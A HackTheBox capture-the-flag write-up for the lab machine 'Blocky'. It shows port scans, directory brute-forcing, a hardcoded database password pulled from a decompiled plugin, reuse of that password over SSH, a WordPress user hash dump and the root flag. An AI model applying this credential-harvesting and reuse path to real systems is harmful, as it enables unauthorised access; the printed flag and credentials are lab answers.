Post

HackTheBox Blocky Writeup

Posted
By wzwr1029 10 min read

Blocky

Information Gathering

Nmap Enumeration

Quick Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

┌──(wzwr㉿kali)-[~]
└─$ sudo nmap -sT -Pn -T4 -vv 10.10.10.37     
[sudo] password for wzwr: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 00:58 CDT
Initiating Parallel DNS resolution of 1 host. at 00:58
Completed Parallel DNS resolution of 1 host. at 00:58, 2.05s elapsed
Initiating Connect Scan at 00:58
Scanning 10.10.10.37 [1000 ports]
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 80/tcp on 10.10.10.37
Completed Connect Scan at 00:58, 8.17s elapsed (1000 total ports)
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.067s latency).
Scanned at 2025-04-17 00:58:25 CDT for 8s
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE REASON
21/tcp   open   ftp     syn-ack
22/tcp   open   ssh     syn-ack
80/tcp   open   http    syn-ack
8192/tcp closed sophos  conn-refused

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds

Full Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

┌──(wzwr㉿kali)-[~]
└─$ sudo nmap -sT -Pn -T4 -vv -p- 10.10.10.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 00:58 CDT
Initiating Parallel DNS resolution of 1 host. at 00:58
Completed Parallel DNS resolution of 1 host. at 00:58, 0.00s elapsed
Initiating Connect Scan at 00:58
Scanning 10.10.10.37 [65535 ports]
Discovered open port 22/tcp on 10.10.10.37
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 80/tcp on 10.10.10.37
Connect Scan Timing: About 12.96% done; ETC: 01:02 (0:03:28 remaining)
Connect Scan Timing: About 46.70% done; ETC: 01:00 (0:01:10 remaining)
Discovered open port 25565/tcp on 10.10.10.37
Connect Scan Timing: About 67.50% done; ETC: 01:01 (0:00:52 remaining)
Completed Connect Scan at 01:01, 145.37s elapsed (65535 total ports)
Nmap scan report for 10.10.10.37
Host is up, received user-set (0.063s latency).
Scanned at 2025-04-17 00:58:47 CDT for 146s
Not shown: 65530 filtered tcp ports (no-response)
PORT      STATE  SERVICE   REASON
21/tcp    open   ftp       syn-ack
22/tcp    open   ssh       syn-ack
80/tcp    open   http      syn-ack
8192/tcp  closed sophos    conn-refused
25565/tcp open   minecraft syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 145.39 seconds

UDP Scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

┌──(wzwr㉿kali)-[~]
└─$ sudo nmap -sU -Pn -vv 10.10.10.37                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-17 01:02 CDT
Initiating UDP Scan at 01:02
Scanning blocky.htb (10.10.10.37) [1000 ports]
Completed UDP Scan at 01:03, 34.90s elapsed (1000 total ports)
Nmap scan report for blocky.htb (10.10.10.37)
Host is up, received user-set (0.084s latency).
Scanned at 2025-04-17 01:02:34 CDT for 35s
Not shown: 998 open|filtered udp ports (no-response)
PORT   STATE  SERVICE REASON
22/udp closed ssh     port-unreach ttl 63
80/udp closed http    port-unreach ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 34.95 seconds
           Raw packets sent: 2091 (98.692KB) | Rcvd: 7 (476B)

Weird Minecraft Port Scanning

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

PORT      STATE SERVICE   REASON         VERSION
25565/tcp open  minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|specialized|phone|storage-misc
Running (JUST GUESSING): Linux 3.X|4.X (90%), Crestron 2-Series (86%), Google Android 4.X (86%), HP embedded (85%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:crestron:2_series cpe:/o:google:android:4.0 cpe:/h:hp:p2000_g3
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.11 (90%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%), Linux 3.16 (90%), Linux 3.16 - 4.6 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%), Linux 3.8 - 3.11 (90%), Linux 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.94SVN%E=4%D=4/17%OT=25565%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68009E1D%P=aarch64-unknown-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10F%TI=Z%II=I%TS=8)
OPS(O1=M542ST11NW7%O2=M542ST11NW7%O3=M542NNT11NW7%O4=M542ST11NW7%O5=M542ST11NW7%O6=M542ST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%TG=40%W=7210%O=M542NNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Further Scan with NSE Vuln
1
2
3
4
5
6
7

PORT      STATE SERVICE   REASON         VERSION
25565/tcp open  minecraft syn-ack ttl 63 Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
| vulners: 
|   Minecraft 1.11.2: 
|       CNVD-2021-53910 9.8     https://vulners.com/cnvd/CNVD-2021-53910
|       CVE-2023-33245  8.8     https://vulners.com/cve/CVE-2023-33245
|_      CVE-2021-35054  7.5     https://vulners.com/cve/CVE-2021-35054

Hostname

1

10.10.10.37 blocky.htb

Http Enumeration

Seem like wordpress website.

Gobuster Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

┌──(wzwr㉿kali)-[~]
└─$ gobuster dir -u http://blocky.htb/ -w /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 294]
/.htpasswd            (Status: 403) [Size: 294]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/server-status        (Status: 403) [Size: 298]
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
Progress: 20469 / 20470 (100.00%)
===============================================================
Finished
===============================================================

Website Manual Enumeration

Comments RSS file
1
2
3
4
5
6
7
8
9
10
11
12

<rss version="2.0">
<channel>
<title>Comments for BlockyCraft</title>
<atom:link href="http://blocky.htb/index.php/comments/feed/" rel="self" type="application/rss+xml"/>
<link>http://blocky.htb</link>
<description>Under Construction!</description>
<lastBuildDate>Thu, 17 Apr 2025 05:45:30 +0000</lastBuildDate>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=4.8</generator>
</channel>
</rss>

This may indicate that wordpress are in version 4.8

Entries RSS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

<rss version="2.0">
<channel>
<title>BlockyCraft</title>
<atom:link href="http://blocky.htb/index.php/feed/" rel="self" type="application/rss+xml"/>
<link>http://blocky.htb</link>
<description>Under Construction!</description>
<lastBuildDate>Mon, 03 Jul 2017 00:28:31 +0000</lastBuildDate>
<language>en-US</language>
<sy:updatePeriod>hourly</sy:updatePeriod>
<sy:updateFrequency>1</sy:updateFrequency>
<generator>https://wordpress.org/?v=4.8</generator>
<item>
<title>Welcome to BlockyCraft!</title>
<link>
http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/
</link>
<comments>
http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/#respond
</comments>
<pubDate>Sun, 02 Jul 2017 23:51:05 +0000</pubDate>
<dc:creator>Notch</dc:creator>
<category>Uncategorized</category>
<guid isPermaLink="false">http://192.168.2.70/?p=5</guid>
<description>
Welcome everyone. The site and server are still under construction so don&#8217;t expect too much right now! We are currently developing a wiki system for the server and a core plugin to track player stats and stuff. Lots of great stuff planned for the future 🙂
</description>
<content:encoded>
<p>Welcome everyone. The site and server are still under construction so don&#8217;t expect too much right now!</p> <p>We are currently developing a wiki system for the server and a core plugin to track player stats and stuff. Lots of great stuff planned for the future <img src="https://s.w.org/images/core/emoji/2.3/72x72/1f642.png" alt="🙂" class="wp-smiley" style="height: 1em; max-height: 1em;" /></p>
</content:encoded>
<wfw:commentRss>
http://blocky.htb/index.php/2017/07/02/welcome-to-blockycraft/feed/
</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
</channel>
</rss>

We knows the information from above:

  • Username – Notch
  • WordPress Version – 4.8

Endpoint enumeration

wp-includes expose sensitive files

However, it useless for us…

plugins

We can download these files and take a look. To view the content of BlockyCore.jar, we need first to unzip it (in general it would be use jar to extract, however it is ok to use unzip to extract it too, as the .jar is also a zip file)

1
2
3
4
5

┌──(wzwr㉿kali)-[~/Downloads]
└─$ unzip BlockyCore.jar   
Archive:  BlockyCore.jar
  inflating: META-INF/MANIFEST.MF    
  inflating: com/myfirstplugin/BlockyCore.class

Then, we can try to view the content of BlockyCore.class content. However, it is a java source code, we cannot read it directly. We have to use jd-gui decompiler (or IDA, but i lazy to open my windows VM) to view the source code.

1
2
3

┌──(wzwr㉿kali)-[~/Downloads/com/myfirstplugin]
└─$ jd-gui
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

By viewing the content, we find sqlUser and sqlPass!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

package com.myfirstplugin;

public class BlockyCore {
  public String sqlHost = "localhost";
  
  public String sqlUser = "root";
  
  public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
  
  public void onServerStart() {}
  
  public void onServerStop() {}
  
  public void onPlayerJoin() {
    sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
  }
  
  public void sendMessage(String username, String message) {}
}

That’s huge! Let try to use password spray to login as notch with ssh first.

SSH Notch Login

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

┌──(wzwr㉿kali)-[~/Documents/htb/blocky]
└─$ ssh notch@blocky.htb
notch@blocky.htb's password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Fri Jul  8 07:16:08 2022 from 10.10.14.29
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

notch@Blocky:~$ ls
minecraft  user.txt

Yes! we succeed!

Privilege Escalation

Database Extraction

Since we knows there is phpmyadmin running behind, we can try to login as credential found above.

Information Gathering

-- phpMyAdmin SQL Dump
-- version 4.5.4.1deb2ubuntu2
-- http://www.phpmyadmin.net
--
-- Host: localhost
-- Generation Time: Apr 17, 2025 at 01:52 AM
-- Server version: 5.7.18-0ubuntu0.16.04.1
-- PHP Version: 7.0.18-0ubuntu0.16.04.1

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Database: `wordpress`
--

-- --------------------------------------------------------

--
-- Table structure for table `wp_users`
--

CREATE TABLE `wp_users` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Dumping data for table `wp_users`
--

INSERT INTO `wp_users` (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES
(1, 'Notch', '$P$BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/', 'notch', 'notch@blockcraftfake.com', '', '2017-07-02 23:49:07', '', 0, 'Notch');

--
-- Indexes for dumped tables
--

--
-- Indexes for table `wp_users`
--
ALTER TABLE `wp_users`
  ADD PRIMARY KEY (`ID`),
  ADD KEY `user_login_key` (`user_login`),
  ADD KEY `user_nicename` (`user_nicename`),
  ADD KEY `user_email` (`user_email`);

--
-- AUTO_INCREMENT for dumped tables
--

--
-- AUTO_INCREMENT for table `wp_users`
--
ALTER TABLE `wp_users`
  MODIFY `ID` bigint(20) UNSIGNED NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

SUDO… finish

We found nothing on searching these information. So i decided to check sudo permission, and…

1
2
3
4
5
6
7

notch@Blocky:~$ sudo -l
[sudo] password for notch: 
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

Alright… we finish the machine! XDD

1
2
3
4

notch@Blocky:~$ sudo ls /root
root.txt
notch@Blocky:~$ sudo cat /root/root.txt
8278e9222984f5593488a0a85e466c3f
cybersecurity, ctf
pentest cybersecurity ctf
This post is licensed under CC BY 4.0 by the author.